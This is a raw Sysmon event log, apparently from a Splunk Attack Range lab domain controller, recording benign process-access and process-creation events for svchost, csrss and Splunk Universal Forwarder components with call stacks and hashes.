13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.079{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.407{59A5CD1D-910B-6005-7201-00000000A301}36564076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.735{59A5CD1D-910C-6005-7401-00000000A301}28244532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 